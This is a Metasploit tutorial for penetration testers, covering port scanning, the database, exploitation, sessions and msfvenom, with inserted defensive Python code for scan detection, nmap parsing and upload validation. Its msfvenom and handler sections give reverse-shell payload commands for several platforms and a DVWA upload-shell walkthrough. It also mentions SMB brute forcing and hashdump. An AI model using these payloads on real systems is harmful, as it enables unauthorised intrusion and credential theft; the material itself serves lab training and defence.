Metasploit
Tool for scanning, vulnerability assessment and exploitation

Scanning
TCP
Metasploit has a number of modules to scan open ports on the target system. Use the command search portscan to list potential port scanning modules. The following are common modules to use:
portscan/tcp: TCP Port Scanner
portscan/syn: TCP SYN Port Scanner
portscan/ack: TCP ACK Firewall Scanner
It's also possible to perform nmap scans directly from the metasploit console.
UDP
The scanner/discovery/udp_sweep module quickly identifies services running over UDP (User Datagram Protocol). Although it does not conduct an extensive scan of all possible UDP services, it does provide a quick way to identify services such as DNS or NetBIOS.
SMB
The smb_enumshares and smb_version modules are useful in a corporate network and help enumerate SMB services.
Use the smb_login module to brute force known usernames with a password list. Warning: This can be very slow, so only use if there's evidence
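The defender's counterpart to the port scanning modules above is spotting the scan in connection logs. The following is an added example, not code from the original page and not Metasploit code: it reads constructed log lines in an assumed format (timestamp, source, destination:port, TCP flags seen from the source) and reports any source that touches more than a threshold of distinct ports on one host inside a sliding window, noting whether every probe was SYN-only (the signature of a half-open scan such as portscan/syn) or completed the handshake (a connect scan such as portscan/tcp). Names, thresholds and the sample log are this example's own.

```python
"""Port-scan detection over connection-log lines (added example; not Metasploit code).

Constructed log format (an assumption of this example, not a real product's format):
    <ISO timestamp> <src IP> -> <dst IP>:<port> <TCP flags from src>
"S" means only a SYN was seen (a half-open scan never completes the handshake),
"SA" means the handshake completed.  A source that touches more than
PORT_THRESHOLD distinct ports on one host inside WINDOW_SECONDS is reported.
"""
from collections import defaultdict
from datetime import datetime, timedelta

PORT_THRESHOLD = 10   # distinct destination ports per (src, dst) pair before alerting
WINDOW_SECONDS = 60   # sliding window length in seconds

# Constructed sample: 10.0.0.5 sweeps 12 ports on 10.0.0.9 within 12 seconds
# with SYN only (what portscan/syn produces); 10.0.0.7 is ordinary web traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.7 -> 10.0.0.9:443 SA
2024-05-01T10:00:01 10.0.0.5 -> 10.0.0.9:21 S
2024-05-01T10:00:02 10.0.0.5 -> 10.0.0.9:22 S
2024-05-01T10:00:03 10.0.0.5 -> 10.0.0.9:23 S
2024-05-01T10:00:04 10.0.0.5 -> 10.0.0.9:25 S
2024-05-01T10:00:05 10.0.0.5 -> 10.0.0.9:53 S
2024-05-01T10:00:06 10.0.0.5 -> 10.0.0.9:80 S
2024-05-01T10:00:07 10.0.0.5 -> 10.0.0.9:110 S
2024-05-01T10:00:08 10.0.0.5 -> 10.0.0.9:111 S
2024-05-01T10:00:09 10.0.0.5 -> 10.0.0.9:135 S
2024-05-01T10:00:10 10.0.0.5 -> 10.0.0.9:139 S
2024-05-01T10:00:11 10.0.0.5 -> 10.0.0.9:143 S
2024-05-01T10:00:12 10.0.0.5 -> 10.0.0.9:443 S
2024-05-01T10:00:13 10.0.0.7 -> 10.0.0.9:80 SA
"""


def parse_line(line):
    """Split one log line into (timestamp, src, dst, port, flags)."""
    ts, src, _arrow, dst_port, flags = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port), flags


def detect_scanners(log_text, threshold=PORT_THRESHOLD, window=WINDOW_SECONDS):
    """Return {(src, dst): {"ports": n, "syn_only": bool}} for flagged pairs.

    For each (src, dst) pair a sliding window over the time-sorted events counts
    distinct destination ports; the largest count above the threshold is kept.
    """
    events = defaultdict(list)  # (src, dst) -> [(ts, port, flags), ...]
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, port, flags = parse_line(line)
            events[(src, dst)].append((ts, port, flags))

    alerts = {}
    span = timedelta(seconds=window)
    for pair, evs in events.items():
        evs.sort()
        best = None
        start = 0
        for end in range(len(evs)):
            # advance the window start until all events fit inside `span`
            while evs[end][0] - evs[start][0] > span:
                start += 1
            window_evs = evs[start:end + 1]
            ports = {port for _, port, _ in window_evs}
            if len(ports) > threshold and (best is None or len(ports) > best["ports"]):
                best = {
                    "ports": len(ports),
                    # all SYN-only means the scanner never completed a handshake
                    "syn_only": all(flags == "S" for _, _, flags in window_evs),
                }
        if best:
            alerts[pair] = best
    return alerts


if __name__ == "__main__":
    for (src, dst), info in detect_scanners(SAMPLE_LOG).items():
        kind = "SYN scan" if info["syn_only"] else "connect scan"
        print(f"{src} -> {dst}: {info['ports']} distinct ports ({kind})")
```

On the constructed sample the sweep from 10.0.0.5 is reported with 12 distinct ports and syn_only set, while the two ordinary connections from 10.0.0.7 stay below the threshold. In practice the threshold and window are tuned per network; a slow scan spread over hours needs a longer window or per-day distinct-port counts.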
Metasploit Database
To organize target information within an engagement, the metasploit database can be used by setting up a PostgreSQL database.
Start PostgreSQL:
systemctl start postgresql
Initialize the metasploit database:
msfdb init
Start metasploit:
msfconsole
Check database status:
db_status
Add workspace:
workspace -a $WORKSPACE
Once the database is set up, db_nmap can be used to save nmap scan results. The commands hosts and services show information relevant to hosts and services on a target system.
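What db_nmap stores, and what hosts and services later display, is a record per host and per port parsed out of nmap's XML output. The following is an added example of that parsing, not the Metasploit database code and not part of the original page: it turns a constructed, trimmed nmap -sV XML document into host records and flattens the open ports into rows shaped like the services listing. The sample XML, function names and field names are this example's own.

```python
"""Parse nmap XML output into host and service records (added example; not the
Metasploit database code).  The structure mirrors what the `hosts` and
`services` console commands display after a db_nmap run.

SAMPLE_XML below is a constructed, trimmed nmap -sV result, not a real scan.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """\
<nmaprun scanner="nmap" args="nmap -sV 10.0.0.9 10.0.0.10">
  <host>
    <status state="up"/>
    <address addr="10.0.0.9" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/><service name="http" product="Apache httpd" version="2.4.52"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="closed"/><service name="microsoft-ds"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.10" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return a list of host dicts: address, state, hostname, services[]."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        hostname = host.find("hostnames/hostname")
        entry = {
            "address": host.find("address[@addrtype='ipv4']").get("addr"),
            "state": host.find("status").get("state"),
            "hostname": hostname.get("name") if hostname is not None else None,
            "services": [],
        }
        for port in host.findall("ports/port"):
            svc = port.find("service")
            info = ""
            if svc is not None:
                # product/version are optional attributes; join whatever exists
                info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            entry["services"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": port.find("state").get("state"),
                "name": svc.get("name") if svc is not None else None,
                "info": info,
            })
        hosts.append(entry)
    return hosts


def open_services(hosts):
    """Flatten to (address, port, proto, name, info) rows for open ports only."""
    return [
        (h["address"], s["port"], s["proto"], s["name"], s["info"])
        for h in hosts
        for s in h["services"]
        if s["state"] == "open"
    ]


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_XML)
    for h in parsed:
        print(h["address"], h["state"], h["hostname"] or "-")
    for row in open_services(parsed):
        print(row)
```

The same parser works on a real `nmap -oX` file; closed and filtered ports are kept in the host record but left out of the flattened rows, which is the view that matters when deciding which services need patching or exposure review.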
Exploitation
Search for exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit or run. The success of a kill chain heavily relies on a thorough understanding of services running on the target system.
Use show payloads and set payload to choose a useful payload if a preset default is not present. This can often be a trial and error process due to environmental or OS restrictions. Use the show options command to show parameters that can be customized. Common parameters include:
RHOSTS: Target system(s)
RPORT: Target port
LHOST: Listening host
LPORT: Listening port
PAYLOAD: The payload to execute, e.g. shell, stager, RCE
You can background a session using CTRL+Z or abort using CTRL+C. This is very helpful when working on more than one target simultaneously.
The sessions command will list active sessions, while the -i flag selects one of the listed sessions to interact with.
Once in a shell, the shell can sometimes be upgraded to a meterpreter session using the command sessions -u $ID, which can be very helpful for managing pivots and post exploitation methodologies. Two very useful commands include search and hashdump, which allow for file searching and NTLM hash dumping.
MSFvenom
Msfvenom is the metasploit tool used to generate payloads. It can access the payload library and allows full customization of a payload including format, architecture, target system, and bad characters.
Output formats can be viewed using the msfvenom --list command. Encoders can be specified with the -e parameter. The following is an example of a command utilizing msfvenom:
msfvenom -p php/meterpreter/reverse_tcp LHOST=$IP -f raw -e php/base64
Handlers
This is one of the most useful parts of metasploit. Within the metasploit framework, this part is automatically handled by an exploit module. Handlers are designed to catch a shell that is coming from a target back to the attacker machine.
The following scenario follows exploiting the file upload vulnerability present in DVWA (Damn Vulnerable Web Application):
Generate the PHP shell using MSFvenom (this will need to be modified post generation to add php start and end tags):
msfvenom -p php/reverse_php LHOST=$IP LPORT=1337 -f raw > reverse_shell.php
Start the metasploit handler:
msfconsole; use exploit/multi/handler; set LHOST $IP; set LPORT 1337; run
Execute the PHP shell
COMMON EXAMPLES:
Linux ELF (Executable and Linkable Format), 32-bit:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f elf > rev_shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f exe > rev_shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=1337 -f raw > rev_shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f asp > rev_shell.asp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=$IP LPORT=1337 -f raw > rev_shell.py
All of these examples are reverse payloads and work with the exploit/multi/handler module.
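The DVWA scenario above works because the upload endpoint accepts a PHP file and serves it from a directory where the web server executes PHP. The following is an added example of the server-side checks that close that path; it is not DVWA's code, not Metasploit code and not part of the original page. It allowlists image extensions, verifies the content's magic bytes against the declared type (so a renamed script or a double extension fails), scans the whole content for a PHP open tag (so a genuine image with PHP appended also fails), and assigns a random storage name so the uploader never controls the path. The function names, allowlist and sample inputs are this example's own constructions.

```python
"""Server-side upload validation for an image-upload endpoint (added example;
not DVWA's code and not Metasploit code).  Checks: allowlisted extensions,
magic bytes matching the declared type, a scan for embedded PHP open tags,
and a random server-side file name.  Function names, the allowlist and the
sample inputs are this example's own.
"""
import os
import re
import secrets

# Allowed extension -> magic bytes the file content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",           # covers GIF87a and GIF89a
}
# PHP open tags anywhere in the content: "<?php" or the short echo tag "<?=".
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# Constructed sample contents (minimal headers, not full valid images).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'hello'; ?>\n"


def declared_extension(filename):
    """Lower-cased extension after the last dot; 'jpeg' is normalised to 'jpg'."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower().lstrip(".")
    return "jpg" if ext == "jpeg" else ext


def validate_upload(filename, content):
    """Return (accepted, reason).  Every check beyond the first is on content, not the name."""
    ext = declared_extension(filename)
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    if PHP_OPEN_TAG.search(content):
        return False, "embedded PHP tag"
    return True, "ok"


def storage_name(filename):
    """Random name with the validated extension; call only after validate_upload."""
    return secrets.token_hex(16) + "." + declared_extension(filename)


if __name__ == "__main__":
    cases = [
        ("cat.png", PNG_BYTES),                  # genuine image
        ("reverse_shell.php", PHP_BYTES),        # wrong extension
        ("reverse_shell.png", PHP_BYTES),        # renamed script: magic bytes fail
        ("cat.php.png", PHP_BYTES),              # double extension: magic bytes fail
        ("polyglot.png", PNG_BYTES + PHP_BYTES), # image with PHP appended
    ]
    for name, data in cases:
        ok, why = validate_upload(name, data)
        print(f"{name:20s} {'ACCEPT' if ok else 'REJECT'} ({why})")
```

Two design points: the allowlist replaces any blocklist of script extensions (.php, .phtml, .phar and so on), which is the part attackers usually bypass, and the random storage name combined with storing uploads outside the web root, or in a directory with script execution disabled, means that even a file that slips past the content checks is never reachable as a URL the server would execute.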